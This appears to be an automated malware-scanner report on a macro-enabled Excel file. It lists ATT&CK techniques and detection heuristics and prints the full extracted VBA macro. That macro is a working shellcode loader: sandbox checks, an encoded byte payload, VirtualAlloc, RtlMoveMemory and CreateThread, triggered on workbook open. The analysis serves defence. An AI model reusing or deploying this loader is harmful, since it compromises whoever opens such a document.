MALICIOUS
176
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
T1055.012 Process Injection: Process Hollowing
The sample is an Excel document containing VBA macros. Heuristics indicate the presence of a memory callback shellcode loader that uses VirtualAlloc, RtlMoveMemory, and CreateThread, suggesting it allocates memory, copies shellcode into it, and executes it. The GetObject call and Workbook_Open macro further indicate automated execution upon opening. This pattern is typical of macro-based malware designed to download and execute further stages.
Heuristics 6
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA native-memory callback shellcode loader critical OLE_VBA_NATIVE_MEMORY_CALLBACK_LOADERVBA auto-exec macro declares or calls native memory allocation, process-memory write/copy, and callback/timer execution APIs. This is the in-memory shellcode loader pattern: allocate writable memory, copy decoded payload bytes into it, then transfer control through a callback such as CreateTimerQueueTimer. Benign document automation does not combine these primitives.Matched line in script
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open()
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4892 bytes |
SHA-256: b8316e0f39e1e5c5c095664f33ee7532afd7e7ecb46ec0a4bf081d96303d5890 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Function KyO()
Dim kCU As Variant
Dim Ukh As LongPtr
Dim zbG As Long
Dim HaC As Long
Dim ddx As LongPtr
If Application.RecentFiles.Count < 3 Then
Return
End If
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
For Each objItem In colItems
If objItem.NumberOfCores < 3 Then
Return
End If
Next
kCU = Array(257, 77, 136, 233, 245, 237, 209, 5, 5, 5, 70, 86, 70, 85, 87, 77, 54, 215, 106, 77, 144, 87, 101, 86, 91, 77, 144, 87, 29, 77, 144, 87, 37, 77, 144, 119, 85, 77, 20, 188, 79, 79, 82, 54, 206, 77, 54, 197, 177, 65, _
102, 129, 7, 49, 37, 70, 198, 206, 18, 70, 6, 198, 231, 242, 87, 77, 144, 87, 37, 144, 71, 65, 70, 86, 77, 6, 213, 107, 134, 125, 29, 16, 7, 20, 138, 119, 5, 5, 5, 144, 133, 141, 5, 5, 5, 77, 138, 197, 121, 108, _
77, 6, 213, 73, 144, 69, 37, 78, 6, 213, 85, 144, 77, 29, 232, 91, 77, 260, 206, 82, 54, 206, 70, 144, 57, 141, 77, 6, 219, 77, 54, 197, 70, 198, 206, 18, 177, 70, 6, 198, 61, 229, 122, 246, 81, 8, 81, 41, 13, 74, _
62, 214, 122, 221, 93, 73, 144, 69, 41, 78, 6, 213, 107, 70, 144, 17, 77, 73, 144, 69, 33, 78, 6, 213, 70, 144, 9, 141, 77, 6, 213, 70, 93, 70, 93, 99, 94, 95, 70, 93, 70, 94, 70, 95, 77, 136, 241, 37, 70, 87, _
260, 229, 93, 70, 94, 95, 77, 144, 23, 238, 80, 260, 260, 260, 98, 77, 54, 224, 88, 78, 195, 124, 110, 115, 110, 115, 106, 121, 5, 70, 91, 77, 142, 230, 78, 204, 199, 81, 124, 43, 12, 260, 218, 88, 88, 77, 142, 230, 88, 95, _
82, 54, 197, 82, 54, 206, 88, 88, 78, 191, 63, 91, 126, 172, 5, 5, 5, 5, 260, 218, 237, 19, 5, 5, 5, 54, 62, 55, 51, 54, 59, 61, 51, 57, 62, 51, 59, 62, 5, 95, 77, 142, 198, 78, 204, 197, 192, 6, 5, 5, _
82, 54, 206, 88, 88, 111, 8, 88, 78, 191, 92, 142, 164, 203, 5, 5, 5, 5, 260, 218, 237, 125, 5, 5, 5, 52, 55, 127, 91, 90, 55, 72, 120, 91, 60, 103, 108, 127, 60, 89, 81, 123, 90, 124, 57, 85, 94, 124, 102, 53, _
111, 72, 102, 125, 116, 87, 120, 110, 70, 95, 71, 71, 112, 77, 108, 78, 119, 62, 122, 124, 93, 88, 114, 112, 115, 57, 76, 84, 75, 85, 120, 103, 71, 102, 87, 110, 113, 57, 71, 84, 121, 73, 90, 74, 77, 83, 118, 124, 105, 79, _
112, 116, 56, 125, 127, 109, 121, 107, 71, 77, 77, 104, 77, 87, 118, 108, 93, 92, 89, 100, 60, 76, 74, 115, 70, 92, 125, 76, 60, 111, 75, 118, 122, 81, 77, 127, 82, 127, 110, 113, 104, 109, 126, 88, 5, 77, 142, 198, 88, 95, _
70, 93, 82, 54, 206, 88, 77, 189, 5, 55, 173, 137, 5, 5, 5, 5, 85, 88, 88, 78, 204, 199, 240, 90, 51, 64, 260, 218, 77, 142, 203, 111, 15, 100, 77, 142, 246, 111, 36, 95, 87, 109, 133, 56, 5, 5, 78, 142, 229, 111, _
9, 70, 94, 78, 191, 122, 75, 163, 139, 5, 5, 5, 5, 260, 218, 82, 54, 197, 88, 95, 77, 142, 246, 82, 54, 206, 82, 54, 206, 88, 88, 78, 204, 199, 50, 11, 29, 128, 260, 218, 138, 197, 122, 36, 77, 204, 198, 141, 24, 5, _
5, 78, 191, 73, 245, 58, 229, 5, 5, 5, 5, 260, 218, 77, 260, 212, 121, 7, 240, 175, 237, 90, 5, 5, 5, 88, 94, 111, 69, 95, 78, 142, 214, 198, 231, 21, 78, 204, 197, 5, 21, 5, 5, 78, 191, 93, 169, 88, 234, 5, _
5, 5, 5, 260, 218, 77, 152, 88, 88, 77, 142, 236, 77, 142, 246, 77, 142, 223, 78, 204, 197, 5, 37, 5, 5, 78, 142, 254, 78, 191, 23, 155, 142, 231, 5, 5, 5, 5, 260, 218, 77, 136, 201, 37, 138, 197, 121, 183, 107, 144, _
12, 77, 6, 200, 138, 197, 122, 215, 93, 200, 93, 111, 5, 94, 78, 204, 199, 245, 186, 167, 91, 260, 218)
For i = 0 To UBound(kCU)
kCU(i) = kCU(i) - 5
Next i
Ukh = VirtualAlloc(0, UBound(kCU), &H3000, &H40)
For zbG = LBound(kCU) To UBound(kCU)
HaC = kCU(zbG)
ddx = RtlMoveMemory(Ukh + zbG, HaC, 1)
Next zbG
res = CreateThread(0, 0, Ukh, 0, 0, 0)
End Function
Sub Workbook_Open()
KyO
End Sub
Sub AutoOpen()
KyO
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 57856 bytes |
SHA-256: b0d12528c94d577fb8b1e8910a3868baa460c0791bcaedffc586d257098c7e1b |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.